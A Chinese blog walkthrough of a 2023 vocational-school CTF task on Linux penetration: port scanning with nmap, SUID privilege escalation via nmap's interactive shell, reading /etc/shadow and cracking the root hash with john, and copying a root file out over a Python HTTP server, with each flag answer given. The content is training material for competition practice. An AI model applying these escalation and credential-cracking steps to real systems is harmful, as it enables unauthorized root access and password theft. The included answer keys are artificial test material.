2023年中职“网络安全“—Linux系统渗透提权③

最新推荐文章于 2024-09-13 16:37:02 发布
最新推荐文章于 2024-09-13 16:37:02 发布
阅读量875 收藏 11
点赞数 4
CC 4.0 BY-SA版权
分类专栏: 中职网络安全 文章标签: web安全 linux 安全 网络安全 运维 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57060854/article/details/134453089
本文详细介绍了2023年中职网络安全课程中的Linux系统渗透提权任务,包括信息收集、SSH端口号、主机名、内核版本获取,以及管理员提权获取文本内容、密码和图片旗标的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2023年中职"网络安全"—Linux系统渗透提权③

Linux系统渗透提权

任务环境说明:

  • 服务器场景:Server2202(关闭链接)
  • 用户名:hacker密码:123456

1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;

nmap -p- -sV -T4 -n 靶机IP
# -p- 全部端口
# -sV 版本探测
# -T4 针对TCP端口禁止动态扫描延迟超过10ms
# -n 不做DNS解析


flag: 22/tcp

2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;

uname -a            # 输出操作系统信息


flag: Kiowizity

3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;

uname -a            # 输出操作系统信息


flag: 3.13.0-45-generic

4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;

ls /root
cat /root/adftutij.txt


flag: hyjufk983

5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;

find / -perm -u=s -type f 2>/dev/null
# find 查找命令
# / 从根目录开始
# -perm 查找权限
# -u=s 有suid权限的文件
# -type 文件类型
# -f 普通文件
# 2 标准错误输出
# > 输
# /dev/null 空设备文件


nmap --interactive        # 进入nmap交互模式
!sh                       # 执行sh
id                        # 查看id
cat /etc/shadow           # shadow 文件保存密码


vim hash        # 把root信息行写入进去
cat hash        # 查看是否赋值成功
john hash       # 破解hash


flag: 0987654321

6. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。

pwd                                # 查看当前目录
copy /root/flag.jpg flag.jpg       # 复制过来
python -m SimpleHTTPServer 8080    # 在8080端口开启一个HTTP服务


注意一定要加:8080 指定HTTP端口


flag: 2022_year_Skill_competition

2022中职网络安全-infiltration数据包分析(解析+环境)
m0_46056107的博客
06-02 246
 FTP用户名:infiltration密码:infiltration。据第三题的数据信息发现在执行systeminfo可以看到他的系统信息。 服务器场景:FTPServer220817。是扫面机,因为发现它获取的端口特别多,利用。 服务器场景操作系统:未知(关闭连接)服务进行连接控制,所以我们筛选。
2023网络安全比赛--Linux系统渗透中职组(超详细)
Aluxian_的博客
01-14 6627
4.使用渗透机对服务器管理员权,并将服务器中root目录下的文本内容作为flag交;6.使用渗透机对服务器管理员权,并将服务器中root目录下的图片内容作为flag交。1.使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag交;5.使用渗透机对服务器管理员权,并将服务器中root的密码作为flag交;3.使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag交;2.使用渗透机对服务器信息收集,并将服务器中主机名称作为flag交;
2024中职网络安全——Windows操作系统渗透测试(Server2105)
依旧是寻觅
01-09 2207
环境 学习交流+私信 ✓ 服务器场景:Server2105(关闭链接) ✓ 服务器场景操作系统:Windows(版本不详) 1. 通过本地 PC 中渗透测试平台 Kali 对服务器场景进行系统服务及版本扫描渗透 测试,并将该操作显示结果中 445 端口对应的服务版本信息字符串作为 Flag 值交; 2. 通过本地 PC 中渗透测试平台 Kali 对服务器场景进行渗透测试,将该场景网络 连接信息中的 DNS 信息作为 Flag 值 (例如:114.114.114.114) 交; 3. 通过本
网安学习日志(linux权)
qq_61035923的博客
05-29 831
Linux系统利用脏牛漏洞
中职组“网络安全”赛题-Linux操作系统渗透测试-2
Picturej的博客
01-03 728
(如:“-”,“$”,“^”,“&”,…3.通过本地PC中渗透测试平台Kali对靶机场景进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件名称作为Flag值交;4.通过本地PC中渗透测试平台Kali对靶机场景进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件内容作为Flag值交;6.通过本地PC中渗透测试平台Kali对靶机场景进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp的图片文件中的英文单词作为Flag值交。
linux docker位置查找,linux – 如何在Docker中获取依赖子图像列表?(1)
2301_77118221的博客
04-26 600
本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。您应该能够查找父ID以f50f9524513f开头的图像,然后查找这些图像的子图像等.但是.Parent isn’t what you think.,所以在大多数情况下,您需要指定docker图像 – 以上所有才能使其工作,那么你也将获得所有中间层的图像ID.需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论。
2023中职网络空间安全 Linux系统渗透
qq_61988806的博客
03-13 1177
是一种使用Diffie-Hellman协议和1024位密钥来在客户端和服务器之间建立共享密钥的传统密钥交换算法。这里用john爆破 先把/etc/passwd 和 /etc/shadow的内容复制。这里供了ssh的用户hacker的密码123456。符号表示应将其添加到客户端支持的密钥交换算法列表中。同时通过history知道root有key.txt。KexAlgorithms是“密钥交换算法”的缩写。知道了通过创建123文件再利用find权。通过find权得到key.txt的内容。
中职网络安全2023山东省省赛Linux 系统渗透
qq_57147160的博客
01-03 4133
2023山东省赛
2023中职网络安全“——Linux系统渗透权③
2301_77257031的博客
03-28 200
2023中职网络安全“——Linux系统渗透权③。
2023中职网络安全“——Linux系统渗透权(nmap权)
2301_77257031的博客
03-27 300
2023中职网络安全“——Linux系统渗透权(nmap权)
2024山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-C卷
Aluxian_的博客
11-18 1142
2024山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-C卷
网络安全B模块(笔记详解)- Linux操作系统渗透
weixin_57536426的博客
01-26 939
1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag交;2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag交;3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag交;4. 使用渗透机对服务器管理员权,并将服务器中root目录下的文本内容作为flag交;5. 使用渗透机对服务器管理员权,并将服务器中root的密码作为flag交;6. 使用渗透机对服务器管理员权,并将服务器中root目录下的图片内容作为flag交。
2023湖南省中职网络安全任务书
FRANXX_02的博客
03-04 707
3.通过本地PC中的渗透测试平台KALI2020对靶机进行WEB渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,使用相关的渗透测试手段,获取到WEB权限,使用相关指令获取到当前linux用户UID为5的用户,将该用户的用户名称作为FLAG进行交;4.通过本地PC中的渗透测试平台KALI2020对靶机进行WEB渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,使用相关的渗透测试手段,获取到WEB权限,使用相关指令查看后台首页文件,将该文件的第二行的所有字符串作为FLAG进行交。
Linux 系统渗透权-Server2204-(解析)
m0_46056107的博客
12-07 305
4.使用渗透机对服务器管理员权,并将服务器中 root 目录下的文本内容作 为 flag 交;6.使用渗透机对服务器管理员权,并将服务器中 root 目录下的图片内容作 为 flag 交。5.使用渗透机对服务器管理员权,并将服务器中 root 的密码作为 flag 交;3.使用渗透机对服务器信息收集,并将服务器中系统内核版本作为 flag 交;2.使用渗透机对服务器信息收集,并将服务器中主机名称作为 flag 交;用linux的wget下载给777权限木马并执行。发现scp和nc都用不了。
2022全国职业院校技能大赛网络安全中职组)A模块评分标准
m0_74025111的博客
10-28 1224
找到文件(system32,hosts,Program Files, Perflogs) 点击属性—>安全 —->高级—>所有者—>编辑—>其他用户和组—>点击高级—>立即查找—>选择 Administrator (最高用户组)–>一路回车进行更新权限即可。高级安全 Windows 防火墙–>新建规则–>规则类型 设置端口–>协议 和端口设置 tcp 和 445 或者 23–>操作设置阻止连接–>配置文件设置所有–> 名称 445 和 23 端口。c.设置 root 用户的计划任务。
权——Linux
最新发布
weixin_58666006的博客
09-13 1958
拿下getshell后不是管理员账户则需要
2023“楚怡杯“湖南省职业院校技能竞赛“网络安全”竞赛 B模块 Windows渗透Linux
红叶的博客
03-15 2871
目录B-1:Windows操作系统渗透测试1. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试,并将该操作显示结果中Telnet服务对应的端口号作为FLAG交2. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将hydra使用的必要参数当做FLAG进行交(例:nmap -s -p 22);(字典路径/usr/share/wordlists/dir
2022中职组云南省昆明市网络安全竞赛试题
旺仔Sec&blog
01-17 1839
2022中职组云南省昆明市网络安全竞赛试题
Linux下用SUID
热门推荐
谢公子的博客
12-07 2万+
关于SUID详细:Linux下的用户、组和权限 SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。 已知的可用来权的linux可行性的文件列表如下: nmap vim find bash more less nano cp 以下命令可以发现系统上运行...
2023中职网络安全江西 web安全渗透测试
09-22
2023中职教育中的网络安全课程将会涉及江西的web安全渗透测试。江西是我国重要的经济和科技发展地区,网络安全问题日益凸显,因此对于这一领域的本地人才培养尤为重要。 首先,课程将着重培养学生的基础知识,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

acaciaf

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值